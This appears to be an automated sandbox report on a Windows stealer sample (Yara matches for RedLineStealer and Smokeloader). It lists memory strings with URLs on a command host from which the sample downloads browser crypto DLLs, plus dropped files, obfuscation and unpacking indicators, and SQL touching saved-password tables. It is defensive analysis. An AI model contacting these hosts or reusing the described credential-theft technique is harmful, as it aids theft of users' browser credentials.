Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll.U
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll9M
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllJT
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlle
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllllx
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlloU
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/oTab
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/ra
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/soft
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/sqlite3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://okkolus.comppData
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: JEHIJDGI.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JEHIJDGI.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: JEHIJDGI.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JEHIJDGI.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EAD2AC	0_2_61EAD2AC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4B8A1	0_2_61E4B8A1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E75F1F	0_2_61E75F1F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E40065	0_2_61E40065
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9E24F	0_2_61E9E24F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E5023C	0_2_61E5023C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E62554	0_2_61E62554
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4E4BF	0_2_61E4E4BF
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E7A790	0_2_61E7A790
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E18736	0_2_61E18736
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E86668	0_2_61E86668
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E58670	0_2_61E58670
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E10856	0_2_61E10856
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA0BA9	0_2_61EA0BA9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E62CA3	0_2_61E62CA3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E98FE2	0_2_61E98FE2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E88FCA	0_2_61E88FCA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E52F80	0_2_61E52F80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA2F47	0_2_61EA2F47
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E56F18	0_2_61E56F18
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4CEF9	0_2_61E4CEF9
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1EEFF	0_2_61E1EEFF
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E64E0C	0_2_61E64E0C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EA91F6	0_2_61EA91F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9316A	0_2_61E9316A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9F0ED	0_2_61E9F0ED
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9D0C3	0_2_61E9D0C3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E8D0B6	0_2_61E8D0B6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E6904E	0_2_61E6904E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E4304E	0_2_61E4304E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E15337	0_2_61E15337
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E19208	0_2_61E19208
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E534E3	0_2_61E534E3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E77452	0_2_61E77452
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E37930	0_2_61E37930
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E7B85E	0_2_61E7B85E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E21816	0_2_61E21816
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E9FBF0	0_2_61E9FBF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E55BD7	0_2_61E55BD7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E91DC1	0_2_61E91DC1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E6DDA5	0_2_61E6DDA5
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E31DAB	0_2_61E31DAB
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E95D7A	0_2_61E95D7A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E5BC4C	0_2_61E5BC4C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1DEC2	0_2_61E1DEC2
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E69E8F	0_2_61E69E8F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E89E0E	0_2_61E89E0E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: String function: 004043B0 appears 315 times

PE file does not import any functions

Source: nss3[1].dll.0.dr	Static PE information: No import functions for PE file found
Source: vcruntime140[1].dll.0.dr	Static PE information: No import functions for PE file found
Source: nss3.dll.0.dr	Static PE information: No import functions for PE file found
Source: vcruntime140.dll.0.dr	Static PE information: No import functions for PE file found

PE file overlay found

Source: nss3[1].dll.0.dr	Static PE information: Data appended to the last section found
Source: vcruntime140[1].dll.0.dr	Static PE information: Data appended to the last section found
Source: nss3.dll.0.dr	Static PE information: Data appended to the last section found
Source: vcruntime140.dll.0.dr	Static PE information: Data appended to the last section found

Uses 32bit PE files

Source: FFAk2gixx5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/18@1/1

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_00414DD0

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

Jump to behavior

Source: FFAk2gixx5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: FFAk2gixx5.exe, 00000000.00000003.2673898862.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000003.2685397085.00000000231C8000.00000004.00000020.00020000.00000000.sdmp, JECBGCFHCFIDHIDHDGDG.0.dr, CGDGHCBGDHJJKECAECBA.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: FFAk2gixx5.exe	ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_00416230

PE file contains an invalid checksum

Source: nss3[1].dll.0.dr	Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140[1].dll.0.dr	Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
Source: nss3.dll.0.dr	Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140.dll.0.dr	Static PE information: real checksum: 0x16dd4 should be: 0x14d5a

PE file contains sections with non-standard names

Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004176B5 push ecx; ret	0_2_004176C8
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373CF push eax; ret	0_2_02C373D6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373D7 push ecx; ret	0_2_02C373E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373A7 push ecx; ret	0_2_02C373BE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37377 push eax; ret	0_2_02C37386
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3711F push eax; ret	0_2_02C37115
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374EF push ecx; ret	0_2_02C374F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374F7 push ecx; ret	0_2_02C37506
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37497 push eax; ret	0_2_02C374AE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374BF push eax; ret	0_2_02C374EE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3745F push eax; ret	0_2_02C37466
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37507 push edx; ret	0_2_02C3751E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3751F push ecx; ret	0_2_02C37526
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37527 push ecx; ret	0_2_02C37536
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3753F push edx; ret	0_2_02C3754E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD791C push ecx; ret	0_2_02FD792F

Drops PE files

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
